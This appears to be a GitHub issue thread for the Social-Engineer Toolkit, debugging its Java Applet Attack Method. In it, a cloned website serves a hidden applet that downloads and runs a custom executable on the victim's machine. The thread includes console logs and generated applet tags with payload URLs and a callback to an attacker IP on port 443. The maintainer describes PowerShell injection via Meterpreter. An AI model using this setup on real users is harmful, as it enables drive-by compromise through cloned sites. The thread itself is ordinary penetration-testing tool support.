### ISSUE TITLE
Can't get my own binary ri run with SET Java Applet

### ISSUE THREAD

**Issue by juliensobrier** [trustedsec/social-engineer-toolkit#110]
I'm using the Java Applet Attack Method with the he applet built into SET. I use my own executable as the payload. On the client (WIndows 7, Java 1.6.31), I can see the applet running. It downloads the executable but it does not seem to run it. I've enabled the Java console, it does not show anything.

The binary is a .Net console application. I've checked that it run fine manually on the client using powershell.

I'm not sure what to do do debug this further.

**Comment by trustedsec** [comment]
Hey Julien,

What version of SET are you using? Reason I ask is I just made some changes to the java applet which relies on powershell injection first then goes to an executable as a backup. Now that I look at the custom exe functionality, it may be getting circumvented with that change if you are using 6.2. What happens is it checks for powershell, if powershell is installed, it will try powershell injection through meterpreter. Granted not everyone may want to use Metasploit so that would be a problem long term. Let me know what version you are using and I can take a look.

Thanks!

-Dave

**Comment by juliensobrier** [comment]
I thought I was using the latest version  because I run seupdate regularly. But it says v6.1.2

I am trying again with 6.2, I will update you.

Thank you

**Comment by juliensobrier** [comment]
I can see a log from Java with version 2, thank you.  I see 3 to 5  jar files beeing downloaded, but not the msf.exe file.

Is there a way to prevent the page from refreshing so that the Java console stays on to see the debug output?

I see several error messages for files that don't exist: 6l5ZEa4jxXgn , yJXpdCZNh8, etc. It may be an issue with caching.

Java Plug-in 1.6.0_38
Using JRE version 1.6.0_38-b05 Java HotSpot(TM) Client VM
java.io.FileNotFoundException: http://10.32.144.247:80/6l5ZEa4jxXgn
	at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance(Unknown Source)
	at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source)
	at java.lang.reflect.Constructor.newInstance(Unknown Source)
	at sun.net.www.protocol.http.HttpURLConnection$6.run(Unknown Source)
	at java.security.AccessController.doPrivileged(Native Method)
	at sun.net.www.protocol.http.HttpURLConnection.getChainedException(Unknown Source)
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(Unknown Source)
	at Java.init(l:184)
	at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
	at java.lang.Thread.run(Unknown Source)
Caused by: java.io.FileNotFoundException: http://10.32.144.247:80/6l5ZEa4jxXgn
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(Unknown Source)
	at sun.net.www.protocol.http.HttpURLConnection.getHeaderField(Unknown Source)
	at java.net.URLConnection.getContentType(Unknown Source)
	at Java.init(l:200)
	... 2 more

----------------------------------------------------

load: class https://www.yahoo.com/Java.class not found.
java.lang.ClassNotFoundException: https:..www.yahoo.com.Java.class
	at sun.plugin2.applet.Applet2ClassLoader.findClass(Unknown Source)
	at sun.plugin2.applet.Plugin2ClassLoader.loadClass0(Unknown Source)
	at sun.plugin2.applet.Plugin2ClassLoader.loadClass(Unknown Source)
	at sun.plugin2.applet.Plugin2ClassLoader.loadClass(Unknown Source)
	at java.lang.ClassLoader.loadClass(Unknown Source)
	at sun.plugin2.applet.Plugin2ClassLoader.loadCode(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager.createApplet(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
	at java.lang.Thread.run(Unknown Source)
Exception: java.lang.ClassNotFoundException: https:..www.yahoo.com.Java.class
Ignored exception: java.lang.ClassNotFoundException: https:..www.yahoo.com.Java.class

**Comment by juliensobrier** [comment]
I disabled the redirection by removing the parameter 9, I get this error (fake google.com):

basic: Added progress listener: sun.plugin.util.GrayBoxPainter$GrayBoxProgressListener@451ef443
network: Cache entry found [url: http://10.32.144.247/hPTG5itAbQSRKiV.jar, version: null] prevalidated=false/0
network: Connecting http://10.32.144.247/hPTG5itAbQSRKiV.jar with proxy=DIRECT
network: Connecting http://10.32.144.247:80/ with proxy=DIRECT
network: ResponseCode for http://10.32.144.247/hPTG5itAbQSRKiV.jar : 200
network: Encoding for http://10.32.144.247/hPTG5itAbQSRKiV.jar : null
network: Disconnect connection to http://10.32.144.247/hPTG5itAbQSRKiV.jar
cache:  Read manifest for http://10.32.144.247/hPTG5itAbQSRKiV.jar: read=208 full=208
basic: load: class https://www.google.com/Java.class not found.
load: class https://www.google.com/Java.class not found.
java.lang.ClassNotFoundException: https:..www.google.com.Java.class
	at sun.plugin2.applet.Applet2ClassLoader.findClass(Unknown Source)
	at sun.plugin2.applet.Plugin2ClassLoader.loadClass0(Unknown Source)
	at sun.plugin2.applet.Plugin2ClassLoader.loadClass(Unknown Source)
	at sun.plugin2.applet.Plugin2ClassLoader.loadClass(Unknown Source)
	at java.lang.ClassLoader.loadClass(Unknown Source)
	at sun.plugin2.applet.Plugin2ClassLoader.loadCode(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager.createApplet(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
	at java.lang.Thread.run(Unknown Source)
Exception: java.lang.ClassNotFoundException: https:..www.google.com.Java.class
Ignored exception: java.lang.ClassNotFoundException: https:..www.google.com.Java.class

**Comment by juliensobrier** [comment]
Sorry to be so verbose! The file index.html generated by set was "corrupted", there were many <applet> tags with the wrong class attribute. After deleting index.html and re-cloning a website, there is no more error message. Only 1 jar file is being downloaded now. 

If I clone more than 1 site without quitting set, index.html gets corrected. For example:

1. close washingtonpost.com, you get:
<applet code="Java.class" width="1" height="1" archive="Z7VpwPagUbM.jar"><param name="name"><param name="1" value="http://10.32.144.247:80/mwH8WiBBqEMPlD"><param name="2" value=""><param name="3" value="http://10.32.144.247:80/YEWm8F"><param name="4" value="http://10.32.144.247:80/ZDWbalP4I3N2D9"><param name="5" value=""><param name="6" value=""><param name="7" value="10.32.144.247 443"><param name="8" value="YES"><param name="9" value="http://www.cnn.com/"><param name="10" value=""><param name="separate_jvm" value="true"></applet>

2. without leaving set, clone cnn.com. You get 2 applet, the first one is wrong:
<applet code="http://www.cnn.com/Java.class" width="1" height="1" archive="IiyeP67aZgbxM9z.jar"><param name="name"><param name="1" value="http://10.32.144.247:80/AQ3gWdFLD7m"><param name="2" value=""><param name="3" value="http://10.32.144.247:80/PlVYr2YYi4P0eeH"><param name="4" value="http://10.32.144.247:80/id4dXxhAz1Ks"><param name="5" value=""><param name="6" value=""><param name="7" value=""><param name="8" value="YES"><param name="9" value="http://www.washingtonpost.com/"><param name="10" value=""><param name="separate_jvm" value="true"></applet>
<applet code="Java.class" width="1" height="1" archive="Z7VpwPagUbM.jar"><param name="name"><param name="1" value="http://10.32.144.247:80/mwH8WiBBqEMPlD"><param name="2" value=""><param name="3" value="http://10.32.144.247:80/YEWm8F"><param name="4" value="http://10.32.144.247:80/ZDWbalP4I3N2D9"><param name="5" value=""><param name="6" value=""><param name="7" value="10.32.144.247 443"><param name="8" value="YES"><param name="9" value="http://www.cnn.com/"><param name="10" value=""><param name="separate_jvm" value="true"></applet>

**Comment by trustedsec** [comment]
Working on this now for a 6.3 release.. I've added a routine that automatically rewrites a parameter inside the java applet to detect if custom exe's are in use. If it is, it will download then execute the exe appropriately. I'm doing some testing now, I hope to have it released within the next few days.

**Comment by trustedsec** [comment]
Fixed in the newest release. Will have it done by next week at the latest.
